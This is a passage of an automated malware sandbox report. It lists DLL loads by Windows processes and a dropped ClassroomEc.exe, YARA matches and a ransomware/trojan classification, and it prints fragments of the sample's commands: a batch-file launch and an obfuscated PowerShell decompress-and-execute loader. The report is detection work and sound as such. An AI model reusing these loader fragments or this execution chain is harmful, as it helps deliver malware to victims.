              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: napinsp.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: pnrpnsp.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: wshbth.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: nlaapi.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: winrnr.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
              Source: amsi64_7488.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winLNK@54/56@11/15
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D6B300 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,12_2_00D6B300
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D65200 _wtol,SHGetSpecialFolderPathW,_DebugHeapAllocator,_wtol,_DebugHeapAllocator,CoCreateInstance,12_2_00D65200
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D69FC0 memcpy,SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,12_2_00D69FC0
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly4xks1y.lmy.ps1Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # 